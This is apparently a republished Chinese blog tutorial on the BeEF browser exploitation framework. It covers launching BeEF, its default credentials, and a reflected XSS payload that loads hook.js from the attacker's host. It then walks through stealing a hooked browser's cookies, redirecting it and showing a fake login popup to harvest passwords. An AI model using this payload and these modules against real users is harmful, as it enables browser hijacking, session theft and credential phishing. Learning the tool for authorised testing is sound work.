前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >浏览器渗透之BeEF的高级烹饪方式

浏览器渗透之BeEF的高级烹饪方式

作者头像
渗透攻击红队
发布2019-11-19 22:44:15
2.1K0
发布2019-11-19 22:44:15
举报
文章被收录于专栏:漏洞知识库漏洞知识库

BeFF的高级烹饪方式

BeEF介绍

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具

Kali Linux内已经有BeEF的环境,只需要进入/usr/share/beef-xss目录下,./beef运行即可

代码语言:javascript
复制
cd /usr/share/beef-xss/

./beef

BeEF运行截图:

BeEF启动之后会输出在终端很多重要的信息

代码语言:javascript
复制
Browser Exploitation Framework (BeEF) 0.4.7.0-alpha(BeEF的版本是0.4.7.0)

12 extensions enabled(12个扩展)

254 modules enabled(254个利用模块)

接口控制面板::

running on network interface: 127.0.0.1

Hook URL: http://127.0.0.1:3000/hook.js

UI URL:   http://127.0.0.1:3000/ui/panel

running on network interface: 192.168.1.106

Hook URL: http://192.168.1.106:3000/hook.js

UI URL:   http://192.168.1.106:3000/ui/panel

使用BeEF控制台:

URL:(下面两个都可以使用)

http://127.0.0.1:3000/ui/panel

http://192.168.1.106:3000/ui/panel

登陆凭据:

用户名/密码:beef

用户名密码的配置文件是:config.yaml

BeEF主框架控制台页面:

Before being able to fully explore the framework you will have to ‘hook’ a browser. To begin with you can point a browser towards the basic demo page here, or the advanced version here.

鼠标点击here就可以让浏览器和BeEF挂钩(僵尸)

其中192.168.1.100就是我物理机的IP地址

下图是我们获取到的浏览器的信息:

包括浏览的URLCookiesHost Name/IPDate操作系统…等等

其中Commands标签页是BeEF执行大部分攻击模块的地方

绿色的代表该功能有效,并且执行不会被用户所发现

橙色的代表该功能有效,但是执行会被用户所发现

白色的代表该功能不确定是否有效

红色的代表该功能无效

其中Rider标签页可以让挂钩(僵尸)的浏览器作为一个代理

其中XssRays标签页可以帮助我们让挂钩(僵尸)的浏览器的网站所在域作为目标,然后通过BeEF框架搜索跨站脚本攻击,允许我们让挂钩的网站上找到持久的跨站脚本漏洞攻击的漏洞进行利用

其中Ipec标签页可以在http请求中使用http以外的协议等等

因为我们使用的是BeEF自带的挂钩页面所演示,在实战中可以用反射类型的XSS来进行对用户的浏览器进行钓鱼、DNS欺骗、网站克隆等等操作

使用XSS进行BeEF挂钩:

代码语言:javascript
复制
http://www.liuwx.cn/xss.php?="><script src="http://192.168.1.106:3000/hook.js"></script>

这时候BeEF控制台就会看到一个新的挂钩(僵尸)浏览器:

使用BeEF对僵尸浏览器进行攻击

获取用户Cookie

来到Commands标签-点击Browser—>Hooked Domain —>Get Cookie,然后点击右下角的Execute

此时右边就可以看到浏览器的Cookie

对网页进行重定向

来到Commands标签-点击Browser—>Hooked Domain —>Redirect Browser,然后点击右下角的Execute,然后用户的浏览器的该页面就会跳转到http://www.liuwx.cn的页面了。

成功跳转

对网页进行社工弹窗

来到Commands标签-点击Social Engiineering——>Pretty Theft ,然后右上角选择弹窗的类型,右下角点击 Execute

说实话,这个弹窗有点鸡肋,看上去太假了,建议不要使用这个

但是你只要在框内输入了用户名和密码的话

如果僵尸那边输入了用户名密码,点击了登陆的话,控制台是会收到账号密码

目前BeEF使用就到这,后续遇到其他的玩法还会继续更新… …

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-10-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • BeEF介绍
  • 使用BeEF控制台:
  • 登陆凭据:
  • BeEF主框架控制台页面:
  • 使用XSS进行BeEF挂钩:
  • 使用BeEF对僵尸浏览器进行攻击
    • 获取用户Cookie
      • 对网页进行重定向
        • 对网页进行社工弹窗
        相关产品与服务
        网站渗透测试
        网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档